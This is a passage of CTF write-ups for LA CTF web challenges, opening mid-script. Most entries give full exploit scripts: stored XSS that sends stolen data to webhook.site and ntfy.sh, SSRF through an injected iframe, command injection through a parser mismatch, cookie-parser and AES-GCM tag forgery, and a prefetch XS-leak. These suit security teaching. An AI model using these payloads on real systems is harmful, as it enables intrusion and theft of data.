                    print(f"[+] {msg['message']}")
                    if 'FLAG=' in msg['message']:
                        return msg['message']
        except Exception:
            pass
        time.sleep(3)

def main():
    challenge_url = sys.argv[1].rstrip('/')
    bot_url = sys.argv[2].rstrip('/')
    ntfy_topic = f"an-{secrets.token_hex(8)}"

    print(f"[*] Challenge: {challenge_url}")
    print(f"[*] Bot: {bot_url}")
    print(f"[*] Ntfy topic: {ntfy_topic}")

    exploit_url = make_exploit_url(challenge_url, ntfy_topic)
    print(f"[*] Exploit URL length: {len(exploit_url)}")

    print("[*] Submitting to admin bot...")
    status, location = submit_to_bot(bot_url, exploit_url)
    print(f"[*] Bot response: {status} -> {location}")

    result = poll_ntfy(ntfy_topic)
    if result and 'SECRET=' in result:
        secret = result.split('SECRET=')[1].strip()
        flag = urllib.request.urlopen(f"{challenge_url}/flag?secret={secret}").read().decode()
        print(f"[+] FLAG: {flag}")
    elif result:
        print(f"[+] {result}")

if __name__ == '__main__':
    main()
```

**Flag**

```
lactf{3V3n7U4LLy_C0N5I573N7_70_L34X}
```

### blogler

#### Description

The site hosts public user blog pages at `/blog/<username>`. If the user exists, the page renders their blog posts; if they do not exist, the server returns `404` with body `username does not exist`.

Goal: find the flag `lactf{...}`.

#### Solution

The intended weakness is simple user enumeration + content search:

1. Use the oracle on `GET /blog/<username>`:
   * Existing user: `200` and a real HTML blog page.
   * Non-existing user: `404` with body `username does not exist`.
2. Enumerate likely usernames (a dictionary wordlist is enough).
3. For each existing user page, search the HTML for the substring `lactf{`.

This quickly finds a public user named `exploiter` whose blog page contains the flag:

* `https://blogler.chall.lac.tf/blog/exploiter` -> `lactf{7m_g0nn4_bl0g_y0u}`

Solution code (async dictionary brute + flag grep):

```python
import asyncio
import re
from pathlib import Path

import aiohttp

BASE = "https://blogler.chall.lac.tf"
FLAG_RE = re.compile(r"lactf\\{[^}]+\\}")


def candidate_usernames() -> list[str]:
    # Any wordlist works. This one exists on many Linux systems.
    words = Path("/usr/share/dict/words").read_text(errors="ignore").splitlines()
    out = []
    for w in words:
        w = w.strip().lower()
        if not w:
            continue
        if not (1 <= len(w) <= 16):
            continue
        # Keep it simple: typical CTF usernames.
        if not re.fullmatch(r"[a-z][a-z0-9_-]*", w):
            continue
        out.append(w)
    return sorted(set(out))


async def worker(session: aiohttp.ClientSession, q: asyncio.Queue[str]) -> None:
    while True:
        u = await q.get()
        try:
            async with session.get(
                f"{BASE}/blog/{u}",
                timeout=aiohttp.ClientTimeout(total=10),
            ) as r:
                if r.status != 200:
                    continue
                txt = await r.text()
                if "username does not exist" in txt:
                    continue
                m = FLAG_RE.search(txt)
                if m:
                    print(m.group(0))
                    raise SystemExit(0)
        finally:
            q.task_done()


async def main() -> None:
    q: asyncio.Queue[str] = asyncio.Queue()
    for u in candidate_usernames():
        q.put_nowait(u)

    connector = aiohttp.TCPConnector(limit=200)
    async with aiohttp.ClientSession(connector=connector) as session:
        tasks = [asyncio.create_task(worker(session, q)) for _ in range(80)]
        await q.join()
        for t in tasks:
            t.cancel()


if __name__ == "__main__":
    asyncio.run(main())
```

### clawcha

#### Description

The server runs a "claw machine" gacha. The `flag` item exists server-side but has probability `1e-15`, so you realistically only get it if you are the special owner user `r2uwu2` (the server bypasses the probability check for owners).

Authentication is via a signed cookie `username` (`cookie-parser` signed cookies).

#### Solution

The bug is a logic mismatch in `cookie-parser`: after verifying a signed cookie, it also tries to parse any cookie value starting with `j:` as JSON (the "JSON cookie" feature). The app then uses the *post-parsed* `req.signedCookies.username` for authentication.

So we can register a new user whose username is a JSON-cookie payload that parses to the *string* `r2uwu2`, e.g.:

`j: "r2uwu2"`

`cookie-parser` will:

1. Verify the signature for the raw value `j: "r2uwu2"` (valid, since the server signed it for us on `/login`).
2. Parse it as JSON (because it starts with `j:`), turning it into the string `r2uwu2`.

Now `req.signedCookies.username` becomes `r2uwu2`, the app loads the real owner object from its `users` map, and `/claw` will always succeed for `flag`.

Exploit script:

```python
#!/usr/bin/env python3
import os
import random
import requests

TARGET = "https://clawcha.chall.lac.tf"

def main() -> None:
    # cookie-parser treats values starting with "j:" as JSON and parses them.
    # JSON.parse ignores whitespace, so we can add random spaces to avoid collisions
    # if someone already registered a particular username string.
    spaces = " " * random.randint(1, 32)
    username = f'j:{spaces}"r2uwu2"'
    password = os.urandom(8).hex()

    s = requests.Session()

    r = s.post(f"{TARGET}/login", json={"username": username, "password": password}, timeout=15)
    r.raise_for_status()
    assert r.json().get("success") is True

    r = s.post(f"{TARGET}/claw", json={"item": "flag"}, timeout=15)
    r.raise_for_status()
    j = r.json()
    assert j.get("success") is True
    print(j["msg"])

if __name__ == "__main__":
    main()
```

Running it prints the flag from the server response.

### glotq

#### Description

The service provides `jq`, `yq`, and `xq` “as a service” via three endpoints:

* `POST /json`
* `POST /yaml`
* `POST /xml`

Each request contains a JSON/YAML/XML object with fields like `command` and `args`, and the server executes that command.

#### Solution

The core bug is that the server parses the request twice using *different* rules:

1. **Security middleware** decides how to parse the body based on the HTTP `Content-Type` header.
2. **Handler** decides how to parse the body based on the *endpoint path* (`/json` always uses JSON parsing, etc.).

Additionally, Go’s `encoding/json` matches JSON object keys to struct fields/tags **case-insensitively**, while the YAML parser used (`gopkg.in/yaml.v3` with `yaml:"command"`) is effectively **case-sensitive** for those keys.

So we can send a request to `/json` with `Content-Type: application/yaml`:

* The middleware YAML-unmarshals the body and sees only lowercase `command/args`, so we make those look safe (`jq`) and pass the allowlist.
* The `/json` handler JSON-unmarshals the *same* body, and because JSON matching is case-insensitive, we can provide capitalized `Command/Args` that override the effective values used by the handler.

We then execute the SUID helper `/readflag` (present in the container) by abusing `man`’s HTML mode:

* `man -H<browser> <page>` runs `<browser>` to display the HTML output.
* Setting the browser to `/readflag` runs it and prints `/flag.txt`.

Exploit payload (send to `/json` while lying about `Content-Type`):

```json
{
  "command": "jq",
  "args": ["-n", "1"],
  "Command": "man",
  "Args": ["-H/readflag", "jq"]
}
```

One-shot solve script:

```bash
#!/usr/bin/env bash
set -euo pipefail

URL="https://glotq-gkche.instancer.lac.tf"  # replace with your instance

payload='{"command":"jq","args":["-n","1"],"Command":"man","Args":["-H/readflag","jq"]}'

curl -fsS "$URL/json" \
  -X POST \
  -H 'Content-Type: application/yaml' \
  --data-binary "$payload"
```

This returns the flag in the `output` field.

### job-board

#### Description

The job board site has an internal (private) job posting whose description contains the flag. Applicants can submit a job application and then ask an admin recruiter (via an admin-bot) to view it.

#### Solution

The backend tries to HTML-escape user-controlled fields before inserting them into HTML templates, but the `htmlEscape()` implementation is incorrect: it only replaces the *first* occurrence of each special character (`&`, `<`, `>`, `"`, `'`).

In `app.js`:

* Applications are stored server-side and later rendered at `/application/:id`.
* The `why` field is inserted into `site/application.html` inside a `<p>WHY</p>`.
* The server calls `htmlEscape(why)`, but the buggy escaping lets us smuggle a real tag.

Because applications are persisted, this is a **stored XSS**. The admin bot logs in as the admin recruiter and then visits the URL we submit, so our XSS runs in the admin's browser context on `job-board.chall.lac.tf`.

**XSS construction**

We want the rendered HTML to contain a real element like:

```html
<img src=x onerror="...JS...">
```

But the server escapes the first `<`/`>`/`"` it sees.

So we intentionally include *two* of each delimiter, so the first gets escaped and the second remains real:

* Start with `"` so the first double-quote becomes `&quot;`, leaving later quotes intact.
* Include `>>` so the first `>` becomes `&gt;`, leaving the second `>` real.
* Include `<<` so the first `<` becomes `&lt;`, leaving the second `<` real and starting the `<img>` tag.

Payload prefix:

```
">><<img ...>
```

**Exfiltration**

The JS in `onerror`:

1. Fetches `/` and extracts any UUID-looking IDs from the HTML.
   * In practice, the admin view includes a private job ID we cannot see as a normal user.
2. Fetches `/job/<uuid>` for each discovered ID.
3. Regex-searches the responses for `lactf{...}`.
4. Sends the flag out-of-band to a `webhook.site` endpoint using `fetch(..., {mode: 'no-cors'})`.

The only manual step is solving the admin-bot reCAPTCHA to get it to visit our application URL.

**Exploit code**

`solve.py` (runs locally; prints the URL to submit to the admin bot and then polls for the exfiltrated flag):

```python
#!/usr/bin/env python3
"""
Exploit for LA CTF job-board.

This does everything except solving the admin-bot reCAPTCHA. After running, copy
the printed application URL into the admin bot form.
"""

import re
import time
import requests

JOB_BOARD = "https://job-board.chall.lac.tf"
ADMIN_BOT = "https://admin-bot.lac.tf/job-board"

FLAG_RE = re.compile(r"lactf\\{[^}]+\\}")


def new_webhook_uuid() -> str:
    r = requests.post(
        "https://webhook.site/token",
        headers={"Accept": "application/json"},
        timeout=15,
    )
    r.raise_for_status()
    return r.json()["uuid"]


def get_public_job_ids() -> list[str]:
    r = requests.get(JOB_BOARD + "/", timeout=15)
    r.raise_for_status()
    return sorted(set(re.findall(r"/job/([0-9a-f-]{36})", r.text)))


def build_xss(webhook_uuid: str) -> str:
    """
    The server's htmlEscape() is buggy: it only replaces the first occurrence of
    &, <, >, \", and '.

    We exploit that by:
    - Starting with a `\"` so the *first* quote is escaped and later quotes remain.
    - Adding `>>` so the *first* `>` is escaped and later `>` remains.
    - Adding `<<` so the *first* `<` is escaped and later `<` remains (starts a real tag).

    The resulting rendered HTML contains: <img ... onerror="..."> and runs JS
    when the admin recruiter views the application.
    """

    # Avoid single quotes entirely (the first one would be escaped to &#x27; and may break JS).
    js = (
        "(async function(){"
        f"var U=`https://webhook.site/{webhook_uuid}`;"
        "var S=function(d){fetch(U,{method:`POST`,mode:`no-cors`,body:d})};"
        "try{"
        "var t=await fetch(`/`).then(function(r){return r.text()});"
        "var f=t.match(/lactf\\{[^}]+\\}/);"
        "if(f){S(`flag:${f[0]}`);return;}"
        # Grab any UUIDs present in the HTML (admin view may include private jobs).
        "var ids=t.match(/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/g)||[];"
        "var seen={};"
        "for(var i=0;i<ids.length;i++)seen[ids[i]]=1;"
        "for(var id in seen){"
        "try{var tj=await fetch(`/job/${id}`).then(function(r){return r.text()});"
        "var fj=tj.match(/lactf\\{[^}]+\\}/);if(fj){S(`flag:${fj[0]}`);return;}"
        "}catch(e){}"
        "}"
        "S(`done:no_flag ids:${Object.keys(seen).join()}`);"
        "}catch(e){S(`err:${e}`)}"
        "})()"
    )

    return f"\\\">><<img src=x onerror=\\\"{js}\\\">"


def submit_application(job_id: str, payload: str) -> str:
    r = requests.post(
        f"{JOB_BOARD}/application/{job_id}",
        data={"name": "aaa", "email": "a@b.co", "why": payload},
        timeout=15,
    )
    r.raise_for_status()
    m = re.search(r'href=\"(/application/[0-9a-f-]{36})\"', r.text)
    if not m:
        raise RuntimeError("could not find application URL in response")
    return JOB_BOARD + m.group(1)


def poll_webhook_for_flag(webhook_uuid: str, timeout_s: int = 900) -> str | None:
    url = f"https://webhook.site/token/{webhook_uuid}/requests?sorting=newest"
    deadline = time.time() + timeout_s
    seen_req_ids: set[str] = set()

    while time.time() < deadline:
        try:
            r = requests.get(url, headers={"Accept": "application/json"}, timeout=15)
            r.raise_for_status()
            data = r.json().get("data") or []
            for req in data:
                rid = req.get("uuid")
                if not rid or rid in seen_req_ids:
                    continue
                seen_req_ids.add(rid)
                content = req.get("content") or ""
                m = FLAG_RE.search(content)
                if m:
                    return m.group(0)
                if content:
                    print("[webhook] content:", content[:400].replace("\\n", "\\\\n"))
        except Exception:
            pass
        time.sleep(2)

    return None


def main() -> None:
    webhook_uuid = new_webhook_uuid()
    job_ids = get_public_job_ids()
    if not job_ids:
        raise RuntimeError("no public jobs found")

    payload = build_xss(webhook_uuid)
    app_url = submit_application(job_ids[0], payload)

    print("[*] Admin bot page (solve reCAPTCHA here):")
    print(ADMIN_BOT)
    print("[*] Submit this URL to the admin bot:")
    print(app_url)
    print("[*] Exfil webhook UUID (for debugging):", webhook_uuid)
    print("[*] Waiting for admin to visit and exfiltrate flag...")

    flag = poll_webhook_for_flag(webhook_uuid)
    if flag:
        print("[+] FLAG:", flag)
    else:
        print("[-] Timed out waiting for exfil.")


if __name__ == "__main__":
    main()
```

**Flag**

`lactf{c0ngr4ts_0n_y0ur_n3w_l7fe}`

### lactf-invoice-generator

#### Description

The site generates a PDF invoice from JSON input (`name`, `item`, `cost`, `datePurchased`). The PDF is rendered by a headless browser.

#### Solution

The backend builds an HTML template using user input directly (no escaping) and renders it with Puppeteer:

* `dist/invoice-generator/server.js` inserts `${name}`, `${item}`, `${datePurchased}` into HTML.
* `page.setContent(invoiceHTML, { waitUntil: "load" })` then `page.pdf(...)`.

In the provided deployment, there is an internal service named `flag` on the Docker network:

* `dist/flag/flag.js` serves `GET /flag` with `FLAG: <flag>`.
* `dist/docker-compose.yml` shows `invoice-generator` depends on `flag`, both on the same network.

Exploit: HTML-inject an `<iframe>` that loads `http://flag:8081/flag`. Since Puppeteer renders the HTML server-side (inside the container network), it can reach the internal `flag` host and the flag becomes visible in the rendered page, then embedded into the generated PDF.

One-shot exploit (replace `URL` with your instancer URL):

```bash
URL='https://lactf-invoice-generator-w01xc.instancer.lac.tf'
curl -fsS -X POST "$URL/generate-invoice" \
  -H 'Content-Type: application/json' \
  --data-binary '{
    "name":"<div>ACME</div><iframe src=\"http://flag:8081/flag\" style=\"width:100%;height:200px;border:0\"></iframe>",
    "item":"pens",
    "cost":"1",
    "datePurchased":"2026-01-01"
  }' \
  -o invoice.pdf

# Extract flag from the PDF
strings -a invoice.pdf | rg -o 'lactf\{[^}]+\}'
```

Reference solve script (does the same thing and extracts from bytes/strings output):

```python
#!/usr/bin/env python3
import re
import subprocess
import sys

import requests

def main():
    if len(sys.argv) != 2:
        print(f"usage: {sys.argv[0]} <base_url>", file=sys.stderr)
        return 2
    base = sys.argv[1].rstrip("/")

    payload = {
        "name": '<div>ACME</div><iframe src="http://flag:8081/flag" style="width:100%;height:200px;border:0"></iframe>',
        "item": "pens",
        "cost": "1",
        "datePurchased": "2026-01-01",
    }

    r = requests.post(f"{base}/generate-invoice", json=payload, timeout=30)
    r.raise_for_status()
    pdf = r.content

    m = re.search(rb"lactf\{[^}]+\}", pdf)
    if m:
        print(m.group(0).decode())
        return 0

    # Fallback: run `strings` on the bytes.
    p = subprocess.run(
        ["strings", "-a"],
        input=pdf,
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        check=True,
    )
    m = re.search(rb"lactf\{[^}]+\}", p.stdout)
    if not m:
        raise SystemExit("flag not found")
    print(m.group(0).decode())
    return 0

if __name__ == "__main__":
    raise SystemExit(main())
```

Flag obtained from the generated PDF: `lactf{plz_s4n1t1z3_y0ur_purch4s3_l1st}`

### mutation mutation

#### Description

The site claims the flag is “constantly mutating” and that you can get it by inspecting the page.

#### Solution

The server serves two different HTML pages based on `User-Agent`:

* A short decoy page (sent to `curl`-like UAs) that contains a fake `REAL_FLAG`.
* A much larger “real” page (sent to browser UAs) with heavily obfuscated JavaScript that computes the real flag string at runtime.

To solve, fetch the real page using a browser UA, extract the inline `<script>...</script>`, and execute it in Node with minimal DOM stubs. The script computes a constant `F` that is the real `lactf{...}` flag.

Code (one-shot extractor):

```bash
python3 - <<'PY'
import re, subprocess, tempfile, textwrap

UA = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
URL = "https://mutation-mutation.chall.lac.tf/"

html = subprocess.check_output(["curl", "-m", "30", "-sS", "-A", UA, URL]).decode("utf-8", "replace")
script = re.search(r"<script>([\\s\\S]*?)</script>", html).group(1)

runner = textwrap.dedent(\"\"\"\n\
  // Minimal browser stubs so the challenge script can run in Node.\n\
  global.window = { outerWidth: 800, innerWidth: 800, outerHeight: 600, innerHeight: 600 };\n\
  global.NodeFilter = { SHOW_COMMENT: 128 };\n\
\n\
  const fakeParent = { insertBefore() {} };\n\
  const fakeHtml = { parentNode: fakeParent };\n\
  global.document = {\n\
    documentElement: fakeHtml,\n\
    addEventListener() {},\n\
    createTreeWalker() { return { nextNode() { return false; }, currentNode: null }; },\n\
    createComment(s) { return { nodeValue: String(s), remove() {} }; },\n\
  };\n\
\n\
  // Avoid infinite timers.\n\
  global.setInterval = function() { return 0; };\n\
\"\"\")\n+\n+with tempfile.NamedTemporaryFile(\"w\", suffix=\".js\", delete=False, encoding=\"utf-8\") as f:\n+    f.write(runner)\n+    f.write(script)\n+    f.write(\"\\nconsole.log(String(F));\\n\")\n+    path = f.name\n+\n+flag = subprocess.check_output([\"node\", path]).decode(\"utf-8\", \"replace\").strip()\n+print(flag)\n+PY
```

Resulting flag (note: contains Unicode confusables, emoji, and other non-ASCII characters; copy exactly):

```
lactf{с0nѕtаnt_mutаtі0n_1s_fun!_🧬_👋🏽_ІlІ1| ض픋ԡೇ∑ᦞ୞땾᥉༂↗ۑீ᤼യ⌃±❣Ӣ◼ௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌ}
```

### narnes-and-bobles

#### Description

The site is a bookstore. You can register/login, add books to your cart, and checkout to download a zip of your purchased books. One book is `Flag` (`flag.txt`) but costs `1000000`, while new users start with a balance of `1000`.

Goal: bypass the balance check to buy the `Flag` book and read the flag from the downloaded zip.

#### Solution

Relevant code is in `server.js`:

1. Books are loaded from `books.json` into a `Map` (`booksLookup`). One book has a **string** price:
   * `The Part-Time Parliament` has `"price": "10"` (string)
   * `Flag` has `"price": 1000000` (number)
2. `/cart/add` tries to prevent adding non-sample items you can’t afford:
   * It queries the sum of existing non-sample cart items via SQL `SUM(...) AS cartSum`.
   * It computes the cost of the items being added via JS:
     * `additionalSum = ... .map(...price...).reduce((l, r) => l + r, 0);`
   * It blocks if `additionalSum + cartSum > balance`.
3. Two JS/SQLite behaviors combine into a bypass:
   * When the cart is empty, SQLite `SUM(...)` returns `NULL`, which becomes JS `null`.
   * JS `+` is concatenation if either side is a string. If the first added product has price `"10"`, the reduce becomes a string:
     * `0 + "10" -> "010"` (string)
     * `"010" + 1000000 -> "0101000000"` (string)
   * Then the check becomes:
     * `additionalSum + cartSum` is `"0101000000" + null` => `"0101000000null"`
     * `"0101000000null" > 1000` converts to `Number("0101000000null")` => `NaN`
     * `NaN > 1000` is `false`, so the purchase is incorrectly allowed.

Exploit:

1. Register a new user (empty cart so `cartSum` is `null`).
2. In a single `/cart/add` request, add:
   * `The Part-Time Parliament` (price `"10"`, forces string concatenation)
   * `Flag` (price `1000000`) with `is_sample: false` for both.
3. Checkout and read `flag.txt` from the returned zip.

Exploit code (Python):

```python
#!/usr/bin/env python3
import io
import secrets
import zipfile

import requests

BASE = "https://narnes-and-bobles.chall.lac.tf"

PART_TIME_ID = "a3e33c2505a19d18"   # price is the string "10"
FLAG_ID = "2a16e349fb9045fa"        # price is 1000000


def main():
    s = requests.Session()

    username = "user" + secrets.token_hex(8)
    password = secrets.token_hex(16)

    # Register (creates a session cookie).
    r = s.post(
        f"{BASE}/register",
        data={"username": username, "password": password},
        allow_redirects=False,
        timeout=15,
    )
    r.raise_for_status()

    # Add both items in one request so cartSum is NULL->null.
    products = [
        {"book_id": PART_TIME_ID, "is_sample": False},
        {"book_id": FLAG_ID, "is_sample": False},
    ]
    r = s.post(f"{BASE}/cart/add", json={"products": products}, timeout=15)
    r.raise_for_status()

    # Checkout and extract flag.txt from the zip.
    r = s.post(f"{BASE}/cart/checkout", timeout=30)
    r.raise_for_status()

    zf = zipfile.ZipFile(io.BytesIO(r.content))
    flag = zf.read("flag.txt").decode().strip()
    print(flag)


if __name__ == "__main__":
    main()
```

### single-trust

#### Description

The app stores a JSON session object in a client cookie `auth`, encrypted with AES-256-GCM:

* plaintext: `{"tmpfile":"/tmp/pastestore/<32 hex chars>"}`
* cookie: `base64(iv).base64(authTag).base64(ciphertext)`

On each request it decrypts the cookie and uses `user.tmpfile` as the file to read/write. The flag is in `/flag.txt`.

#### Solution

Node (Ubuntu 20.04 `nodejs` package, v10.19.0) accepts *truncated* GCM tags via `decipher.setAuthTag()`. Since the server does not enforce a 16-byte tag length, we can send a 1-byte tag, reducing authentication strength to 8 bits. We can then brute-force the tag byte for any modified ciphertext (\~256 requests).

We cannot directly change the 32 unknown hex bytes (we don't know their plaintext, so we can't compute XOR deltas there). But we can avoid needing them:

1. Keep bytes 28..59 (the unknown hex) unchanged.
2. Rewrite only the first 28 bytes of plaintext from:
   * `{"tmpfile":"/tmp/pastestore/` to:
   * `{"tmpfile":"/flag.txt","x":"`
3. Leave the last 2 bytes unchanged (`"}`), so the unknown 32 bytes become the value of `"x"`, and `tmpfile` becomes `/flag.txt`.

Because AES-GCM encryption is XOR with a keystream, we can transform known plaintext bytes by XORing the ciphertext with `P0 ^ P1` for those positions. After modifying the ciphertext, we brute-force a 1-byte tag until the server accepts it and returns `/flag.txt` in the page.

Exploit code (prints the flag):

```py
import base64
import re
import urllib.parse
import requests

BASE = "https://single-trust.chall.lac.tf"

# Known plaintext prefix in the original cookie (28 bytes)
P0 = b'{"tmpfile":"/tmp/pastestore/'
# Desired prefix (also 28 bytes): set tmpfile to /flag.txt and start a filler field "x"
P1 = b'{"tmpfile":"/flag.txt","x":"'
assert len(P0) == len(P1) == 28

s = requests.Session()
r = s.get(BASE + "/", timeout=15)
r.raise_for_status()

# Cookie value is URL-encoded in Set-Cookie; decode then split on '.'
auth = urllib.parse.unquote(s.cookies.get("auth"))
iv_b64, tag_b64, ct_b64 = auth.split(".")
iv = base64.b64decode(iv_b64)
ct = base64.b64decode(ct_b64)

# Bit-flip first 28 bytes of ciphertext to change plaintext P0 -> P1
ctm = bytearray(ct)
for i in range(28):
    ctm[i] ^= P0[i] ^ P1[i]
ctm = bytes(ctm)

# Brute-force 1-byte GCM tag
for guess in range(256):
    tag1 = bytes([guess])
    forged = ".".join(
        [
            base64.b64encode(iv).decode(),
            base64.b64encode(tag1).decode(),
            base64.b64encode(ctm).decode(),
        ]
    )
    r = requests.get(BASE + "/", cookies={"auth": forged}, timeout=15)
    m = re.search(r"lactf\\{[^}]+\\}", r.text)
    if m:
        print(m.group(0))
        break
```

### the-trial

#### Description

The site shows a slider that generates a 4-letter word, then sends it to `POST /getflag` as `application/x-www-form-urlencoded` with the parameter `word`.

#### Solution

View source / DevTools shows the client-side JS builds a 4-letter string from an alphabet and submits it via:

`fetch("/getflag", { method: "POST", body: "word=<generated>" })`

The backend doesn't enforce the slider; it just checks the posted value. Bypass the UI and submit `word=flag` directly:

```bash
curl -sS -X POST 'https://the-trial.chall.lac.tf/getflag' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'word=flag'
```

Python equivalent:

```python
#!/usr/bin/env python3
import re
import requests

BASE = "https://the-trial.chall.lac.tf"

def get_flag() -> str:
    r = requests.post(f"{BASE}/getflag", data={"word": "flag"}, timeout=20)
    r.raise_for_status()
    m = re.search(r"lactf\\{[^}]+\\}", r.text)
    if not m:
        raise RuntimeError(f"flag not found in response: {r.text!r}")
    return m.group(0)

if __name__ == "__main__":
    print("flag:", get_flag())
```

Flag: `lactf{gregor_samsa_awoke_from_wait_thats_the_wrong_book}`

### bobles-and-narnes

#### Description

This challenge is a simple bookstore web app with a cart. The `Flag` “book” costs `$1000000`, but new accounts only have `$1000`. Checkout returns a ZIP of the purchased files, and the real flag is in `flag.txt`.

#### Solution

The key bug is in `POST /cart/add`:

* The server computes how much to charge using the **request body**:
  * `additionalSum = products.filter(p => !+p.is_sample).map(price).sum()`
  * So setting `is_sample: true` on the flag item makes it *not* counted (no “too poor” rejection).
* But it inserts cart rows using Bun SQL’s object bulk insert:
  * `await db\`INSERT INTO cart\_items ${db(cartEntries)}\`\`
  * When `db([...])` is given an array of objects, the INSERT column list is taken from the **first object** only.
  * If the first object omits `is_sample`, the INSERT omits the `is_sample` column for *all* rows, so every inserted row gets `is_sample = NULL` (even later objects that included `is_sample`).

At checkout:

* `const path = item.is_sample ? samplePath : fullPath`
* `NULL` is falsy, so `item.is_sample` selects the **full** file path (`flag.txt`), giving the real flag.
* The balance can go negative on checkout (no “enough money” check there), so we just need to pass the `/cart/add` check.

Exploit strategy:

1. Add two products in one request:
   * Product 0: any cheap book, **omit** `is_sample` entirely (so the INSERT omits that column).
   * Product 1: the flag book with `is_sample: true` (so the price check skips charging it).
2. Checkout and unzip `flag.txt`.

Solution code (`solve_final.py`):

```python
#!/usr/bin/env python3
import io
import time
import uuid
import zipfile

import requests

BASE = "https://bobles-and-narnes.chall.lac.tf"

FLAG_BOOK_ID = "2a16e349fb9045fa"
CHEAP_BOOK_ID = "509d8c2a80e495fb"  # $20


def _post(session: requests.Session, path: str, *, json=None, data=None, timeout=20):
    return session.post(f"{BASE}{path}", json=json, data=data, allow_redirects=False, timeout=timeout)


def attempt_once() -> str:
    s = requests.Session()
    username = "u" + uuid.uuid4().hex[:10]
    password = "p" + uuid.uuid4().hex[:10]

    r = _post(s, "/register", data={"username": username, "password": password})
    if r.status_code >= 500:
        raise RuntimeError(f"register backend error: {r.status_code} {r.text[:80]}")
    if r.status_code not in (302, 303):
        raise RuntimeError(f"register failed: {r.status_code} {r.text[:200]}")

    payload = {"products": [{"book_id": CHEAP_BOOK_ID}, {"book_id": FLAG_BOOK_ID, "is_sample": True}]}
    r = _post(s, "/cart/add", json=payload)
    if r.status_code != 200:
        raise RuntimeError(f"add failed: {r.status_code} {r.text[:200]}")
    j = r.json()
    if j.get("err"):
        raise RuntimeError(f"add rejected: {j['err']}")

    r = _post(s, "/cart/checkout", data={})
    if r.status_code != 200:
        raise RuntimeError(f"checkout failed: {r.status_code} {r.text[:200]}")
    if "application/zip" not in (r.headers.get("content-type") or ""):
        raise RuntimeError(f"unexpected content-type: {r.headers.get('content-type')}")

    with zipfile.ZipFile(io.BytesIO(r.content)) as zf:
        return zf.read("flag.txt").decode(errors="replace").strip()


def main():
    for i in range(60):
        try:
            print(attempt_once())
            return 0
        except Exception:
            time.sleep(min(2.0, 0.1 * (i + 1)))
    return 1


if __name__ == "__main__":
    raise SystemExit(main())
```

### extend-note

#### Description

Customers loved append-note so much, we decided to add an extended version! :)

#### Solution

extend-note is identical to append-note (part 1) except one line: the error page no longer reflects user input, eliminating the XSS vector used in part 1.

**The app** (Flask 3.0.0, Python 3.14) stores a random 8-hex-char `SECRET` in a `notes` list. Three endpoints:

* `/append?content=X&url=URL` — requires admin cookie. Returns **200** if any note starts with `content`, else **404**. Always appends `content` to `notes`. Responds with a page that JS-redirects to `url` after 100ms.
* `/flag?secret=S` — returns the flag if `S == SECRET`. Has `Access-Control-Allow-Origin: *`.
* After-request headers on all responses: `X-Content-Type-Options: nosniff`, `X-Frame-Options: deny`, `Cache-Control: no-store`.

The admin bot visits any URL with an `httpOnly`, `SameSite=Lax` cookie for the challenge domain and waits 60 seconds.

**The attack has three parts:**

**1. Same-site XSS via blogler**

The blogler challenge (separate LACTF web challenge) runs on `*.instancer.lac.tf` — same site as extend-note. Blogler renders user blog posts through `mistune.html()` with Jinja2's `|safe` filter, giving us stored XSS on a same-site origin. Since both share eTLD+1 `lac.tf`, the admin's `SameSite=Lax` cookie is sent on all subresource requests from blogler to extend-note.

**2. `<link rel="prefetch">` XS-leak oracle**

The challenge's protections (`nosniff`, `X-Frame-Options: deny`, `no-store`) defeat most XS-leak techniques. Comprehensive testing of every HTML element type revealed that **`<link rel="prefetch">` is the one that differentiates HTTP status codes**:

| Element                                        | 200 (text/html + nosniff) | 404 (text/html + nosniff) |
| ---------------------------------------------- | ------------------------- | ------------------------- |
| `<script>`                                     | `onerror`                 | `onerror`                 |
| `<link rel="stylesheet">`                      | `onerror`                 | `onerror`                 |
| `<link rel="preload" as="fetch">`              | `onload`                  | `onload`                  |
| `<link rel="preload" as="script/style/image">` | `onerror`                 | `onerror`                 |
| **`<link rel="prefetch">`**                    | **`onload`**              | **`onerror`**             |
| `<img>`, `<video>`, `<audio>`, `<object>`      | `onerror`                 | `onerror`                 |

This gives a clean boolean oracle: `onload` = prefix matches (200), `onerror` = no match (404).

**3. Extract SECRET and fetch flag**

Probe the secret character by character (16 hex candidates per position, 8 positions) using the prefetch oracle, then fetch the flag from the CORS-enabled `/flag` endpoint.

**Solve payload** (hosted as a blogler blog post):

```html
<script>
(async()=>{
var C='https://extend-note-XXXXX.instancer.lac.tf';
var N='https://ntfy.sh/UNIQUE_TOPIC';
function x(m){fetch(N,{method:'POST',body:m})}
function mk(c){
  return C+'/append?content='+encodeURIComponent(c)
    +'&url='+encodeURIComponent(C+'/')+'&t='+Math.random();
}
function probe(content){
  return new Promise(r=>{
    var l=document.createElement('link');
    l.rel='prefetch';
    var d=0;
    l.onload=()=>{if(!d){d=1;l.remove();r(true)}};
    l.onerror=()=>{if(!d){d=1;l.remove();r(false)}};
    l.href=mk(content);
    document.head.appendChild(l);
  });
}
x('start');
var sec='';
for(var i=0;i<8;i++){
  for(var c of '0123456789abcdef'){
    if(await probe(sec+c)){sec+=c;x('found-'+i+':'+c+' sec='+sec);break}
  }
}
x('SECRET='+sec);
try{
  var r=await fetch(C+'/flag?secret='+sec);
  var t=await r.text();
  x('FLAG='+t);
}catch(e){x('ERR='+e)}
})();
</script>
```

**Deployment steps:**

```bash
# 1. Register on blogler and upload payload as a blog post
curl -s -c cookies.txt -X POST "https://BLOGLER/register" -d "username=solve&password=solve"
curl -s -b cookies.txt -X POST "https://BLOGLER/blog" \
  --data-urlencode "title=x" --data-urlencode "blog@solve.html"

# 2. Send the blogler URL to the admin bot
curl -s -X POST "https://ADMIN_BOT/extend-note" \
  -d "url=https://BLOGLER/blog/solve&g-recaptcha-response="

# 3. Poll ntfy for flag
curl -s "https://ntfy.sh/UNIQUE_TOPIC/json?poll=1"
```

The entire extraction (8 characters × up to 16 probes each = 128 prefetch requests) completes in under 2 seconds. Results are exfiltrated via ntfy.sh.

